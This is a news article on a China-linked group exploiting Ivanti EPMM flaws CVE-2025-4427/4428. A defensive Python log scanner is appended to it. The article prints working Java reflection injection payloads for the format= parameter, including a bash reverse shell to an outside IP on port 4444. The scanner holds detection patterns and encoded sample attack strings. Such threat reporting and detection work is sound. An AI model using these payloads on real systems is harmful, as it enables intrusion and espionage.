Chinese Nexus Hackers Actively Exploiting Ivanti Endpoint Manager Mobile Vulnerability
- From site: Vulnerability (cybersecuritynews.com)
Author: Tushar Subhra Dutta
A sophisticated China-linked threat group has been actively exploiting critical vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM) systems since May 15, 2025, targeting organizations across healthcare, telecommunications, aviation, municipal government, finance, and defense sectors globally.
The campaign leverages two newly disclosed vulnerabilities, CVE-2025-4427 and CVE-2025-4428, which can be chained together to achieve unauthenticated remote code execution on exposed systems.
The exploitation campaign has demonstrated remarkable breadth, with confirmed victims spanning Europe, North America, and the Asia-Pacific region.
Affected organizations include municipal governance agencies in Scandinavian capitals, UK healthcare trusts, German telecommunications providers, U.S. medical device manufacturers, and Japanese automotive suppliers.
The attackers have shown particular interest in organizations managing large fleets of mobile devices, capitalizing on EPMM’s central role in enterprise mobile device management to potentially compromise thousands of managed endpoints across targeted networks.
EclecticIQ analysts identified the threat activity and attributed it with high confidence to UNC5221, a China-nexus espionage group previously linked to zero-day exploitation campaigns targeting edge network appliances since at least 2023.
The group demonstrates sophisticated understanding of EPMM’s internal architecture, repurposing legitimate system components for covert data exfiltration operations that include personally identifiable information, authentication credentials, and sensitive organizational data.
The attackers have deployed advanced malware including KrustyLoader, which retrieves encrypted Sliver backdoor payloads from compromised Amazon AWS S3 buckets, and utilized Fast Reverse Proxy (FRP) tools to establish persistent network access for reconnaissance and lateral movement.
The campaign’s technical sophistication and targeting patterns align with state-sponsored cyber espionage objectives, raising significant concerns about the potential for long-term intelligence collection and network compromise.
Initial Compromise Mechanism and Exploitation Techniques
The threat actors achieve initial system access by exploiting an unauthenticated remote code execution vulnerability targeting the /mifs/rs/api/v2/ endpoint, where malicious commands are injected through the format= parameter.
The exploitation leverages Java-based server-side injection techniques, embedding complex payloads within HTTP GET requests that abuse Java reflection capabilities to execute arbitrary system commands.
The attackers utilize Java reflection syntax to invoke Runtime.getRuntime().exec() for command execution, as demonstrated in the following payload structure: ${"".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null).exec("COMMAND").waitFor()}.
This technique ensures the Java thread remains active until external processes complete, maintaining communication channels between attackers and compromised systems.
EclecticIQ researchers documented specific examples of reverse shell establishment, where attackers execute commands such as ${"".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null).exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/64.52.80.21/4444 0>&1"}).waitFor()} to create interactive command-line access to victim systems.
Additionally, the threat actors employ complementary Java expressions using Scanner objects to capture command output: ${"".getClass().forName("java.util.Scanner").getConstructor("".getClass().forName("java.lang.Process").getMethod("exec", "COMMAND").getInputStream()).useDelimiter("\\A").next()}.
This dual-technique approach enables attackers to both execute malicious commands and immediately retrieve their results, effectively establishing reliable command-and-control mechanisms through server-side Java injection vulnerabilities.
The sophistication of these exploitation methods demonstrates the threat group’s deep technical expertise and their ability to rapidly weaponize newly disclosed vulnerabilities for large-scale espionage operations.
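As an added defensive illustration that is not part of the original article: a small log-scanning routine that flags requests to the /mifs/rs/api/v2/ path whose format= parameter carries a ${...} expression containing the Java reflection markers quoted above. The log lines are constructed samples in combined-log shape; the source addresses, timestamps and the exact sub-resource under /mifs/rs/api/v2/ are placeholders, not values from the article.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Path prefix and parameter the article names as the injection point.
TARGET_PREFIX = "/mifs/rs/api/v2/"
TARGET_PARAM = "format"

# Fragments of the reflection chain quoted in the article; any of them inside
# a ${...} expression on the target path is enough to flag the request.
EL_MARKERS = ('"".getClass()', ".forName(", "java.lang.Runtime",
              "java.util.Scanner", ".invoke(", ".exec(")

# Combined-log format: src ident user [ts] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample lines (placeholders, not article data). Line 3 carries a
# URL-encoded ${...} reflection chain; line 4 the same idea double-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [16/May/2025:10:01:02 +0000] "GET /mifs/rs/api/v2/?format=json HTTP/1.1" 200 512
10.0.0.9 - - [16/May/2025:10:01:05 +0000] "GET /mifs/admin/ HTTP/1.1" 200 2048
203.0.113.7 - - [16/May/2025:10:02:11 +0000] "GET /mifs/rs/api/v2/?format=%24%7B%22%22.getClass%28%29.forName%28%22java.lang.Runtime%22%29.getMethod%28%22getRuntime%22%29.invoke%28null%29%7D HTTP/1.1" 500 0
198.51.100.4 - - [16/May/2025:10:03:40 +0000] "GET /mifs/rs/api/v2/?format=%2524%257B%2522%2522.getClass%2528%2529.forName%2528%2522java.util.Scanner%2522%2529%257D HTTP/1.1" 200 77
"""

def _decode(value: str, rounds: int = 2) -> str:
    """URL-decode up to `rounds` times so double-encoded values still match."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def detect_el_injection(log_text: str) -> list[dict]:
    """Return one finding per line whose format= value holds a ${...}
    expression with reflection markers, on the EPMM API path only."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-log line; skip rather than guess
        parts = urlsplit(m["target"])
        if not parts.path.startswith(TARGET_PREFIX):
            continue
        # parse_qs decodes once; _decode handles a second encoding layer
        for raw in parse_qs(parts.query, keep_blank_values=True).get(TARGET_PARAM, []):
            value = _decode(raw)
            hits = [k for k in EL_MARKERS if k in value]
            if "${" in value and hits:
                findings.append({"src": m["src"], "ts": m["ts"],
                                 "status": m["status"], "markers": hits})
    return findings
```

Because the routine only inspects the request line, it sees nothing sent in request bodies or headers; it is a triage filter for access logs, not a substitute for the vendor patch.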